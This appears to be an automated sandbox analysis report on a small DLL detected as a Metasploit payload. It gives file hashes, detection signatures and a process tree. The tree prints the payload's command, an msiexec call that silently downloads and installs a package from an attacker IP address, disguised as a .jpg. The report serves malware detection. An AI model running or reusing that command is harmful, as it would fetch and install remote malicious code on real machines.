Analysis

  • max time kernel
    46s
  • max time network
    43s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    03-06-2022 13:58

General

  • Target

    12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll

  • Size

    5KB

  • MD5

    d9337ff3c22d2a4258890fd38c5e7d7f

  • SHA1

    6dae55e6a58b612fedb42ebb73a77f9c4b932e27

  • SHA256

    12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5

  • SHA512

    166d9dd0c11cc8d685868e976014938d1abfbb087485324f720b76002e44250309e618622461b6203ea6470dedec62002bea3bda32f4ebf7ef385c78327315ac

Malware Config

Extracted

Family

metasploit

Version

windows/single_exec

Signatures

  • MetaSploit

    Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.

  • Blocklisted process makes network request 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1704
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\12ed6d183cc130f8a7c33418013a05ffbec817a2981e987ef5931e0e9245d7c5.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Suspicious use of WriteProcessMemory
      PID:616
      • C:\Windows\SysWOW64\rundll32.exe
        rundll32.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:760
        • C:\Windows\SysWOW64\msiexec.exe
          msiexec /i http://23.227.200.242:2650/hbYDuh9tfbBfVYg7up.jpg /q
          4⤵
          • Use of msiexec (install) with remote resource
          • Suspicious use of AdjustPrivilegeToken
          PID:2028
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:2016

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/616-54-0x0000000000000000-mapping.dmp
  • memory/616-55-0x00000000755B1000-0x00000000755B3000-memory.dmp
    Filesize

    8KB

  • memory/760-56-0x000000000048178C-mapping.dmp
  • memory/2016-60-0x000007FEFBB71000-0x000007FEFBB73000-memory.dmp
    Filesize

    8KB

  • memory/2028-58-0x0000000000000000-mapping.dmp